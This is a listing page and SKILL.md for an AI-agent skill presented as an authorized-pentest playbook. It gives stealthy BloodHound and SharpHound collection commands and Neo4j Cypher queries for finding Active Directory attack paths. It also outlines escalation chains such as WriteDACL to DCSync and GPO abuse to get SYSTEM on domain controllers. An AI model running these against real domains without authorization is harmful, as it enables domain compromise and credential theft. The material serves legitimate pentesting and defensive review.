Active Directory Acl Abuse
Load BloodHound attack-path patterns, stealth collection flags, and Neo4j Cypher queries while you validate Active Directory ACL abuse on an authorized engagement.
Overview
active-directory-acl-abuse is an agent skill for the Ship phase that supplies BloodHound collection playbooks, Neo4j Cypher templates, and ACL chain analysis patterns for authorized Active Directory testing.
Install
npx skills add https://github.com/yaklang/hack-skills --skill active-directory-acl-abuseWhat is this skill?
- Compares five BloodHound collection modes (DCOnly, All, Session, ACL, ObjectProps) on speed, noise, and data coverage
- Stealth recipes for bloodhound-python (-c DCOnly/Session) and SharpHound (DCOnly, ACL, --stealth, --excludedc)
- Ready Cypher for shortest paths from owned nodes to DOMAIN ADMINS groups
- Cypher to surface users and groups with GetChanges/GetChangesAll chains toward a domain (DCSync-style rights)
- Companion to the repo’s main SKILL.md for individual ACL abuse techniques and chain analysis
- Documents five BloodHound collection modes: DCOnly, All, Session, ACL, and ObjectProps
- Includes essential Cypher templates for Domain Admin shortest paths and DCSync-style rights chains
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You have BloodHound data but waste cycles guessing collection flags and writing Cypher every time you hunt Domain Admin or DCSync paths from ACL edges.
Who is it for?
Authorized pentesters, defenders doing purple-team graph review, or indie builders maintaining an AD lab who already use BloodHound and Neo4j.
Skip if: Unauthorized domain access, production credential spraying without scope, or teams that only need generic OWASP app checks with no directory context.
When should I use this skill?
Load when you need common BloodHound attack paths, custom Neo4j Cypher queries, or chain analysis for ACL abuse, with the main repo SKILL.md already in context for individual techniques.
What do I get? / Deliverables
You run documented low-noise collectors, execute standard path queries in Neo4j, and hand off specific ACL abuses to the repo’s main SKILL.md techniques with clearer attack chains.
- Documented BloodHound collection command set matched to engagement constraints
- Reusable Cypher queries for priority AD attack paths
- ACL chain notes linked to follow-on abuse techniques from the parent SKILL.md
Recommended Skills
Journey fit
Identity and ACL abuse validation belongs in Ship when you harden or formally test directory services before exposing admin paths in production. BloodHound graph analysis and DCSync-style path queries are offensive security work—canonical shelf is Ship → security, not generic backend build.
How it compares
Use as a BloodHound/Cypher playbook inside your agent—not as a passive MCP integration or a substitute for SharpHound ingest discipline on its own.
Common Questions / FAQ
Who is active-directory-acl-abuse for?
It is for security practitioners and solo builders on legally scoped Active Directory work who use BloodHound and want agent-guided collection choices and Cypher for ACL-heavy attack paths.
When should I use active-directory-acl-abuse?
Use it during Ship security reviews when ingesting BloodHound graphs, comparing DCOnly versus full collection noise, or querying shortest paths to Domain Admins and DCSync-related rights before remediation planning.
Is active-directory-acl-abuse safe to install?
The skill describes offensive AD techniques; only use on systems you are allowed to test. Review the Security Audits panel on this Prism page and your org policy before running collectors or queries against real domains.
SKILL.md
READMESKILL.md - Active Directory Acl Abuse
# BloodHound Attack Paths & Cypher Queries > **AI LOAD INSTRUCTION**: Load this for common BloodHound attack paths, custom Cypher queries for Neo4j, and chain analysis techniques. Assumes the main [SKILL.md](./SKILL.md) is already loaded for individual ACL abuse techniques. --- ## 1. BLOODHOUND DATA COLLECTION BEST PRACTICES ### Collection Methods Comparison | Method | Speed | Noise | Data | |---|---|---|---| | `DCOnly` | Fast | Low | Users, groups, trusts, ACLs (from DC only) | | `All` | Slow | High | Everything including sessions and local groups | | `Session` | Medium | Medium | Logged-in user sessions (run multiple times) | | `ACL` | Medium | Low | ACL data only | | `ObjectProps` | Fast | Low | Object properties (descriptions, etc.) | ### Stealth Collection ```bash # Minimum noise — DC only queries bloodhound-python -d domain.com -u user -p pass -c DCOnly -dc DC01.domain.com # Add sessions over time bloodhound-python -d domain.com -u user -p pass -c Session -dc DC01.domain.com # Avoid SMB enumeration (noisiest) SharpHound.exe -c DCOnly,ACL --excludedc --stealth ``` --- ## 2. ESSENTIAL CYPHER QUERIES ### 2.1 Find All Paths to Domain Admin ```cypher MATCH p=shortestPath((n)-[*1..]->(m:Group)) WHERE m.name STARTS WITH "DOMAIN ADMINS" AND n.owned = true RETURN p ``` ### 2.2 Find Users with DCSync Rights ```cypher MATCH p=(n)-[:MemberOf|GetChanges*1..]->(d:Domain) MATCH p2=(n)-[:MemberOf|GetChangesAll*1..]->(d) WHERE n:User OR n:Group RETURN n.name ``` ### 2.3 Kerberoastable Users with Paths to DA ```cypher MATCH (u:User {hasspn:true}) MATCH p=shortestPath((u)-[*1..]->(g:Group)) WHERE g.name STARTS WITH "DOMAIN ADMINS" RETURN u.name, length(p) AS hops ORDER BY hops ASC ``` ### 2.4 Users with Dangerous ACLs ```cypher MATCH p=(n:User)-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner|ForceChangePassword]->(m) WHERE NOT n.name STARTS WITH "DVTA" RETURN n.name AS attacker, type(r) AS permission, m.name AS target ``` ### 2.5 Find Computers with Unconstrained Delegation ```cypher MATCH (c:Computer {unconstraineddelegation:true}) WHERE NOT c.name STARTS WITH "DC" RETURN c.name ``` ### 2.6 Find AS-REP Roastable Users ```cypher MATCH (u:User {dontreqpreauth:true}) RETURN u.name, u.description ``` ### 2.7 Computers Where Domain Users Are Local Admin ```cypher MATCH p=(g:Group {name:"DOMAIN USERS@DOMAIN.COM"})-[:AdminTo]->(c:Computer) RETURN c.name ``` ### 2.8 Find All GPO Controllers ```cypher MATCH p=(n)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl]->(g:GPO) RETURN n.name AS controller, g.name AS gpo, type(r) AS permission ``` ### 2.9 Shortest Path from Owned to High-Value Targets ```cypher MATCH p=shortestPath((n {owned:true})-[*1..]->(m {highvalue:true})) RETURN p ``` ### 2.10 Find LAPS Readers ```cypher MATCH p=(n)-[:ReadLAPSPassword]->(c:Computer) RETURN n.name AS reader, c.name AS computer ``` --- ## 3. COMMON ATTACK PATH PATTERNS ### Pattern 1: Nested Group Membership → DA ``` lowpriv_user └── MemberOf → IT-Support └── MemberOf → Server-Admins └── MemberOf → Domain Admins ``` ```cypher MATCH p=(u:User {name:"LOWPRIV@DOMAIN.COM"})-[:MemberOf*1..5]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.COM"}) RETURN p ``` ### Pattern 2: ACL Chain → GenericAll → Password Reset → DA ``` lowpriv_user └── GenericWrite → helpdesk_user └── GenericAll → svc_admin (DA member) └── ForceChangePassword → reset password → DA ``` ### Pattern 3: WriteDACL → DCSync ``` lowpriv_user └── WriteDACL on Domain Object └── Grant self GetChanges + GetChangesAll └── DCSync → all domain hashes ``` ### Pattern 4: GPO Abuse → Local Admin on DC ``` lowpriv_user └── GenericWrite on GPO linked to "Domain Controllers" OU └── Add scheduled task via GPO └── Task runs on DCs → SYSTEM on DC ``` ### Pattern 5: LAPS + Local Admin → Session Hijack ``` lowpriv_user └── ReadLAPSPassword on TARGET_SERVER └── Local admin on TARGET_SERVER